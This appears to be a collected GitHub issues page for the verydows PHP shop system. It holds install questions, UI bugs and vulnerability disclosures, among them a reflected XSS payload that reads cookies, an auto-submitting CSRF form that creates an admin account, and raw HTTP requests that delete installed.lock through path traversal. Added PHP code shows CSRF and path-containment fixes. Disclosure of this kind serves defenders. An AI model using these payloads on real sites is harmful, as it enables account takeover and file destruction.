verytops / verydows
B2C e-commerce system: PC + H5 mobile + WeChat, for quickly building your own online store
Home Page: http://demo.verydows.com
License: Other
How do I set up the WeChat side?
WARNING: require(C:\xampp0\htdocs\vdows\vendor/autoload.php): failed to open stream: No such file or directory in C:\xampp0\htdocs\vdows\protected\include\core.php on line 18.
Could someone help me get this installed?
Environment installed from verydows-master
In page localhost/index.php?c=main&a=index, the Get function can change the function used in PHP; the user/attacker can modify the parameter and add a script, which will be shown without filtering. They can use the script to steal the cookie or something worse.
Payload used: <script>alert(document.cookie)</script>
Affected URL: http://localhost/index.php?c=main&a=index%3Cscript%3Ealert(document.cookie)%3C/script%3E
Navigate to the Affected URL, Payload would be triggered.
Payload used - <script>alert(document.cookie);</script>
Upload a png file in the background file management office, you can rename it to a php file
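The "Settings" button in the top-right corner of the admin panel covers the entire admin page. Each time I have to click Back to return to the admin panel.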
Warning: file_put_contents(/www/wwwroot/aisuyuki.xyz/protected/config.php): failed to open stream: Permission denied in /www/wwwroot/aisuyuki.xyz/install/resources/function.php on line 195
Warning: file_put_contents(/www/wwwroot/aisuyuki.xyz/protected/cache/setting.php): failed to open stream: Permission denied in /www/wwwroot/aisuyuki.xyz/install/resources/function.php on line 204
There is a CSRF vulnerability that allows information and other operations to be changed
http://dcbang.net/QQ.PNG
POC:
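public/theme/frontend/default/js/general.js: at line 209 inside the $.fn.vdsConfirm method, if it is called multiple times the event is bound to the button repeatedly, so that N events fire when the final confirmation is clicked.
Solution:
A line should be added at line 208: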
$confirm.find('button').unbind('click');
Both the home page and the admin panel show the same problem
A CSRF vulnerability was found in this cms.
A logged-in administrator user may add another administrator account by clicking the following POC
<form action="http://thewind/verydows/index.php?m=backend&c=admin&a=add&step=submit" id="test" method="post">
<!--Change the url when testing!-->
<input type=text name="username" value="TomAPU" />
<input type=text name="password" value="123456" />
<input type=text name="resetpwd" value="1" />
<input type=text name="repassword" value="123456" />
<input type=text name="name" value="TomAPU" />
<input type=text name="email" value="[email protected]" />
</form>
<script>
var f=document.getElementById("test");
f.submit();
</script>
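A server-side check that refuses a request like the one above, shown as an added example that is not part of the original report or of the verydows code base. The function names, the `csrf_token` field and the sample field values are assumptions made for the illustration.

```php
<?php
// Added example, not verydows code. $session stands in for $_SESSION and
// $post for $_POST so the check can be exercised without a web server.

function csrf_issue_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

function csrf_request_allowed(array $session, string $method, array $post): bool
{
    // State-changing actions must arrive by POST and carry the session token.
    if ($method !== 'POST') {
        return false;
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    // is_string() rejects csrf_token[]=... arrays before hash_equals().
    if ($expected === '' || !is_string($supplied)) {
        return false;
    }
    return hash_equals($expected, $supplied); // constant-time comparison
}

// Constructed requests for the add-administrator action.
$session = ['admin_id' => 1];
$token = csrf_issue_token($session);

// Fields as a cross-site page would send them: the browser attaches the
// session cookie, but the other origin cannot read the token.
$crossSite = ['username' => 'example', 'password' => 'placeholder', 'resetpwd' => '1'];
$sameSite  = $crossSite + ['csrf_token' => $token]; // backend form embeds it
$arrayForm = $crossSite + ['csrf_token' => ['x']];

$cases = ['cross-site' => $crossSite, 'backend form' => $sameSite, 'array token' => $arrayForm];
foreach ($cases as $label => $post) {
    $ok = csrf_request_allowed($session, 'POST', $post);
    echo str_pad($label, 14), $ok ? "accepted\n" : "rejected\n";
}
```

Only the request built from the backend's own form is accepted; the token has to be emitted as a hidden field in every backend form that changes state.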
Vulnerability file: \protected\controller\backend\file_controller.php
It can be seen that the deleted file or directory is received through the path parameter, and is directly deleted without security filtering, so we can use this vulnerability to delete any file
Vulnerability to reproduce:
POST /index.php?m=backend&c=file&a=delete HTTP/1.1
Host: www.xxx.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.xiaodi.com/index.php?m=backend&c=file&a=index
Cookie: VDSSKEY=d6123bedd1b697a783c9da6f0b92254c
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
path[]=../install/installed.lock
3、Click Send Packet, you can see that the file was deleted successfully
4、It can be seen that when the installed.lock file exists, when visiting http://x.x.x/install, the page will directly jump to the front home page
Therefore, when we delete the installed.lock file and visit http://x.x.x/install again, we will come to the installation wizard page
Repair suggestion:
This .htaccess does not seem to be able to filter it
Vulnerable file: \protected\controller\backend\database_controller.php
It can be clearly seen that $file is not security filtered
Vulnerable code:
....................................................
..................................................
Vulnerability to reproduce:
1、First log in to the background to get the cookie
2、Here I delete the installed.lock file to verify the existence of the vulnerability, the construction package is as follows:
POST /index.php?m=backend&c=database&a=restore&step=delete HTTP/1.1
Host: www.xxx.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.xiaodi.com/index.php?m=backend&c=database&a=restore
Cookie: VDSSKEY=d6123bedd1b697a783c9da6f0b92254c
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
file%5B%5D=../../../install/installed.lock
3、Click to send the data package, you can see that the file was deleted successfully
4、It can be seen that when the installed.lock file exists, when visiting http://xxx/install, the page will directly jump to the front home page
So as long as we delete the installed.lock file, we can reinstall the system. When we delete the installed.lock file and visit http://x.x.x/install, we will enter the installation wizard page
Repair suggestion:
1、Filter ../ or ..\ in the file variable
2、Limit the scope of deleted files or directories
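One way to implement both repair suggestions for the two delete actions reported above (`c=file&a=delete` and `c=database&a=restore&step=delete`), shown as an added example that is not part of the original reports or of the verydows code base. The helper name `resolve_inside`, the `upload` base directory and the temporary demo tree are assumptions; the check canonicalizes the path and confirms containment instead of stripping `../` from the string.

```php
<?php
// Added example, not verydows code: resolve a user-supplied relative path
// and accept it only if it stays inside an allowed base directory.

/**
 * Returns the canonical absolute path if $userPath resolves to an existing
 * entry strictly inside $baseDir, otherwise null.
 */
function resolve_inside(string $baseDir, string $userPath): ?string
{
    $base = realpath($baseDir);
    if ($base === false || strpos($userPath, "\0") !== false) {
        return null;
    }
    // realpath() collapses ../ (and ..\ on Windows) and follows symlinks;
    // it returns false when the target does not exist.
    $target = realpath($base . DIRECTORY_SEPARATOR . $userPath);
    if ($target === false) {
        return null;
    }
    // Compare with a trailing separator so /data/upload_evil does not pass
    // as a child of /data/upload; the base directory itself is refused too.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($target, $prefix, strlen($prefix)) === 0 ? $target : null;
}

// Constructed demo tree in a temp directory (hypothetical layout).
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'vds_demo_' . bin2hex(random_bytes(4));
mkdir($root . '/upload/img', 0700, true);
mkdir($root . '/install', 0700, true);
touch($root . '/upload/img/logo.png');
touch($root . '/install/installed.lock');

$requests = [
    'img/logo.png',                      // legitimate file under the base
    '../install/installed.lock',         // traversal value from the report
    'img/../../install/installed.lock',  // same target, nested form
    '.',                                 // the base directory itself
];
foreach ($requests as $path) {
    $resolved = resolve_inside($root . '/upload', $path);
    if ($resolved === null) {
        echo "REJECT  $path\n";
        continue;
    }
    unlink($resolved);
    echo "DELETE  $path\n";
}
echo file_exists($root . '/install/installed.lock') ? "lock file intact\n" : "lock file removed\n";
```

Because the decision is made on the canonical path, encoded or nested traversal sequences and symlinks that point outside the base are rejected by the same comparison.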
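When the data cache period is set to 0 in the admin panel, pages still use cached data.
This is inconsistent with the description: "Update period (in seconds) of the data cache used in front-end controllers; setting it to "0" means the cache is not used".
Why are administrator and user records stored separately instead of being merged? Logging in with them merged should be more convenient.
For example: things like the LOGO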